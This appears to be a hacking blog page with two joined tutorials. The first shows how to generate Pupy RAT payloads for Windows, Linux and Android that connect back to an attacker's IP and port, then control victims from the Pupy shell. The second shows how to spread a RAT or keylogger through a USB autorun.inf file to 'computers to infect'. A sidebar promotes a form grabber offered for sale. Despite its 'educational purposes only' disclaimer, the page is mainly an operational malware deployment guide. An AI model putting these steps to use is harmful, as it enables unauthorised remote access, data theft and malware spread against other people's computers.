Thursday, December 1, 2016

What is Pupy?Pupy is an opensource, multi-platform (Windows, Linux, OSX, Android), multi function RAT (Remote Administration Tool) and post-exploitation tool mainly written in python. 
It features a all-in-memory execution guideline and leaves very low footprint. Pupy can communicate using various transports, migrate into processes (reflective injection), load remote python code, python packages and python C-extensions from memory.
Read more: https://github.com/n1nj4sec/pupy

In this tutorial, I'll be showing you how to setup Pupy and generate payloads for Windows, Linux and Android.

Warning
This guide is meant for educational purposes only, accessing other people's computers without appropriate permissions is illegal and I don't condone it in any way.
I am not responsible for your actions.

Getting Started...
To get started, head over to the official Pupy GitHub repo and download the entire project as a zip file.

[Image: a9dd1c3f47.png]

Extract the contents of the archive and read the text file titled 'Requirements.txt' inside the folder.
This text file contains the list of packages required for setting up Pupy - make sure you install all of them.

Generating The Payload
Once you're done installing all the packages, we're ready to generate our payload.

For this, open a terminal window in the directory which contains the 'pupygen.py' file and type:

Code:
./pupygen.py
You should now be able to see the proper usage/parameters to be used while generating the payload.
[Image: pupy1.png]

Now open a different terminal and type in the following command to find your IP address:

Code:
ifconfig
[Image: ifconfig.png]
The highlighted IP address is the one to which you want your target machines to connect. 
Note it down and close the terminal.

Here are the commands for generating payloads for Windows, Linux and Android respectively.
[Image: pupy2.png]

Windows:

Code:
./pupygen.py -f exe_x86 -o <FileName>.exe connect --host <IP:Port>
Replace IP:Port with the IP address that we obtained in the above step and any valid port number that is not currently in use.
For targeting 64bit machines, change exe_x86 to exe_x64.

Linux:

Code:
./pupygen.py -f py -o <FileName>.py connect --host <IP:Port>

Android:

Code:
./pupygen.py -f apk -o <FileName>.apk connect --host <IP:Port>

[Image: pupy3.png]
If everything went well, it should say "payload successfully generated" and the payload should be visible in the same folder.

Remote Administration
To begin remote administration once the payload has been deployed, open another terminal in the same folder and type in:

Code:
./pupysh.py
That will open up the Pupy shell. If it says "Server started on port <PORTNUMBER> with transport ssl", it means your port number was valid and not in use and you're all set to accept the connecting from the target machine.
Input a question mark (?) to get the list of all the available commands.
[Image: pupysh.png]

To see all the available modules, type in:

Code:
list_modules
[Image: modules.png]

To use a particular module, follow the format:

Code:
run <MODULE NAME>
If a module requires additional parameters, that will be specified.

Once you're done remotely administrating the machine, use the following command to disconnect all the clients:

Code:
run general/exit

Conclusion

This works over LAN. If you wish to do this over the internet, find your public IP address online and make sure that the port you select is appropriately forwarded.

A simple Windows 32bit payload generated by Pupy is around 6MB in size (pretty big) and it is in no way perfect. But it is free and opensource! 
Keep that in mind while using Pupy.

That's pretty much it. 
If you have any questions, feel free to ask.
I will be teaching all of you lovely female dogs of how to make a USB autorun an application such as a RAT or Keylogger

What you need:
• A USB that you don't care about
• Your RAT, bot, etc
• Computers to infect


1.
First your going to wanna plug in your USB, then click start and press computer. Go over to you USB and right click and press format after that press restore device defaults. This pretty much just clears everything off your USB to make it run faster.



2.
Now that you have reformatted your USB, go to notepad and put this:

Code:
[autorun]
open=filename.exe
action=randomtexthere
label=renameflashdrive
icon=randomicon.ico

Here's what these commands do :
'open=' opens a specific file you want in your flash drive, Put Your Virus Name .exe
'action=' is what will be displayed on the autorun menu, you can name it anything really.
'label=' it will rename your flash drive to whatever is after the =
'icon=' will change the icon of the flash drive u can use a .exe icon or a .ico icon


Example of what I use:

Code:
[autorun]
open=networking.exe
action=networking
label=MyFlashDrive
icon=Hardware.ico


You can get any .ico off the internet and use that.

Now click file, save as and save it as autorun.inf


3.
You can close out of all that now. From here just put the your icon, your application, and the autorun.inf file on your USB.



4.
Now just plug your USB into any computer you see and the press enter, you have to press enter to select and run your server.


I hope you've enjoyed this little tutorial I made! :)
Thought I would share some after lurking for a long time.

adf popup

adf

MY SKYPE

Powered by Blogger.

Random Posts

Featured Post

Form Grabber Released Works With IE,CROME and FIREFOX ,Unicode support [ 14-02-2016]

Hello guys! here i am releasing My form grabber Today, i have been coding this for oven 6 months and finally its time for public sales.....

Followers

Recent in Culture

News

Lorem 1

Pages

Popular Posts

Popular Posts